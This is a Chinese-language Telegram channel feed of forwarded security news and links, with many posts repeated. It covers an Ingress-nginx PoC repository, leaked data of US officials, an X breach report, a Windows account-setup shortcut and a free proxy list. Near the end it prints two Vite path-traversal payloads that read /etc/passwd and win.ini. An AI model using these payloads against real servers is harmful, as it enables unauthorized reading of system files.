Forwarded from 赛博安全威胁情报🥸
This media is not supported in your browser
VIEW IN TELEGRAM
Ingress-nginx漏洞利用 poc, 可能导致Kubernetes集群被接管
https://github.com/hakaioffsec/IngressNightmare-PoC
#poc #redteam #漏洞情报
https://github.com/hakaioffsec/IngressNightmare-PoC
#poc #redteam #漏洞情报
Forwarded from miko
你每天都很急,一分钟的资产归属不想去查,三分钟的子域名不愿意去跑,一天的灯塔扫描结果等不及要看。
看课要两倍速,挖洞只关心结果,遇到历史漏洞只想找个GUI工具输入URL直接梭哈,失去了被动扫描根本无从下手。
你学习网安的焦虑,一方面是源自“我挖洞跟别人的差距太大了”,另一方面是源自“我想缩小跟别人的差距,但太难了”。
于是安慰自己说别人都是有天赋才变强的,努力也赶不上他们。
第二天网上冲浪依然继续收集别人的payload,即使你知道那些payload这辈子很难用上。
你的nuclei总是有十几万个yaml,你的路由器每天向外发包有一半都是nday的poc。
你的burp插件总是拉满,但这并不能满足你,你总是秉承着多多益善的原则,burp套了yakit又套xray再套xscan再套ez再套awvs.........
晚上十点半,你看着一大堆乱七八糟无用的误报/垃圾洞,只好打开终端,输入一些无意义的命令,拍照到朋友圈:我们都在用力的活着。
看课要两倍速,挖洞只关心结果,遇到历史漏洞只想找个GUI工具输入URL直接梭哈,失去了被动扫描根本无从下手。
你学习网安的焦虑,一方面是源自“我挖洞跟别人的差距太大了”,另一方面是源自“我想缩小跟别人的差距,但太难了”。
于是安慰自己说别人都是有天赋才变强的,努力也赶不上他们。
第二天网上冲浪依然继续收集别人的payload,即使你知道那些payload这辈子很难用上。
你的nuclei总是有十几万个yaml,你的路由器每天向外发包有一半都是nday的poc。
你的burp插件总是拉满,但这并不能满足你,你总是秉承着多多益善的原则,burp套了yakit又套xray再套xscan再套ez再套awvs.........
晚上十点半,你看着一大堆乱七八糟无用的误报/垃圾洞,只好打开终端,输入一些无意义的命令,拍照到朋友圈:我们都在用力的活着。
😭3
Forwarded from LoopDNS资讯播报
特朗普政府高官个人信息遭泄露 密码及私人手机号被曝光
德国《明镜》周刊披露,包括国家安全顾问迈克·沃尔茨、国防部长皮特·赫格塞斯在内的多名特朗普政府高级官员的个人信息被发现在线公开,涉及仍在使用的手机号码、电子邮箱及部分密码。这些敏感数据通过人员搜索引擎和公开数据泄露库获取,并与官员们的Dropbox、微软Teams等办公账户关联。尽管部分账户在媒体询问后进行了权限限制,但测试显示发送至沃尔茨和加巴德WhatsApp账户的信息仍能成功送达。网络安全专家警告,高级官员面临的国家级黑客威胁远高于普通民众,此类信息泄露可能被外国间谍利用。
来源:连线
德国《明镜》周刊披露,包括国家安全顾问迈克·沃尔茨、国防部长皮特·赫格塞斯在内的多名特朗普政府高级官员的个人信息被发现在线公开,涉及仍在使用的手机号码、电子邮箱及部分密码。这些敏感数据通过人员搜索引擎和公开数据泄露库获取,并与官员们的Dropbox、微软Teams等办公账户关联。尽管部分账户在媒体询问后进行了权限限制,但测试显示发送至沃尔茨和加巴德WhatsApp账户的信息仍能成功送达。网络安全专家警告,高级官员面临的国家级黑客威胁远高于普通民众,此类信息泄露可能被外国间谍利用。
来源:连线
Forwarded from 蓝点网订阅频道 (山外的鸭子哥)
#技术教程 跳过 Windows 11 登录微软账户新方法,只需要简单命令即可创建本地账户。
在 X/Twitter 上网友 WitherOrNot 分享了跳过账户登录新方法,只需要在命令提示符中输入 start ms-cxh:localonly 即可调出账户设置窗口,在这里可以更快创建本地账户。
查看全文:https://ourl.co/108586
→欢迎关注:蓝点网订阅频道
→欢迎关注:蓝点网X/Twitter
→联系编辑:山外的鸭子哥
在 X/Twitter 上网友 WitherOrNot 分享了跳过账户登录新方法,只需要在命令提示符中输入 start ms-cxh:localonly 即可调出账户设置窗口,在这里可以更快创建本地账户。
查看全文:https://ourl.co/108586
→欢迎关注:蓝点网订阅频道
→欢迎关注:蓝点网X/Twitter
→联系编辑:山外的鸭子哥
Forwarded from 每日消费电子观察 (horo)
X 平台被曝遭遇严重数据泄露,涉及超 28 亿条个人数据信息 - IT之家
https://www.ithome.com/0/841/904.htm
https://www.ithome.com/0/841/904.htm
Ithome
X 平台被曝遭遇严重数据泄露,涉及超 28 亿条个人数据信息 - IT之家
这一规模远超 X 平台现有的约 3.357 亿个用户,因此该泄露数据集除实际活跃用户外可能还包含了大量等特殊账户,也无法排除从第三方获得的可能。
搞了一个免费的clash翻墙订阅,自动从网上爬取能用的clash代理,选取速度最快的发在Github上,每30分钟更新一次(
https://github.com/PuddinCat/BestClash
https://github.com/PuddinCat/BestClash
GitHub
GitHub - PuddinCat/BestClash: 每30分钟更新!免费Clash翻墙订阅,自动从网上爬取并测速 | 免费代理 | VPN | 订阅 | 节点 | clash meta | mihomo | 翻墙 | 科学上网 | 梯子 |
每30分钟更新!免费Clash翻墙订阅,自动从网上爬取并测速 | 免费代理 | VPN | 订阅 | 节点 | clash meta | mihomo | 翻墙 | 科学上网 | 梯子 | - PuddinCat/BestClash
❤4👍1
mysql的python客户端rce CVE-2025-21548
论为什么python里到处都是eval
https://mp.weixin.qq.com/s/h3qOUrzhANfDJ0PuAJyc6w
论为什么python里到处都是eval
https://mp.weixin.qq.com/s/h3qOUrzhANfDJ0PuAJyc6w
Puddin在TG上看到了啥
搞了一个免费的clash翻墙订阅,自动从网上爬取能用的clash代理,选取速度最快的发在Github上,每30分钟更新一次( https://github.com/PuddinCat/BestClash
跑了一天,代理质量还是不错的,就是我的电脑内存爆了
而且还发现python的一个bug,就是python的with语句会影响异步上下文的切换,然后就会让本来应该异步运行的函数卡住
而且还发现python的一个bug,就是python的with语句会影响异步上下文的切换,然后就会让本来应该异步运行的函数卡住
❤1
Forwarded from Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init
/@fs/C://windows/win.ini?import&?inline=1.wasm?init
Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init /@fs/C://windows/win.ini?import&?inline=1.wasm?init
vite还在发力
CVE-2025-31125(CVE-2025-30208的Bypass)
CVE-2025-31125(CVE-2025-30208的Bypass)